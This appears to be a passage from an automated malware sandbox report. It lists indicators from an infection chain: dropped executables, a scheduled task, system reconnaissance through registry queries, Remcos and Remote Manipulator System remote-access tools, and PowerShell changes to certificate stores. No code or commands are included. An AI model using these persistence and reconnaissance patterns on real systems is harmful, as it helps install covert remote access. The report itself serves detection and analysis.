| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = (binary data omitted) | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = (binary data omitted) | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-9216 = "This PC" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
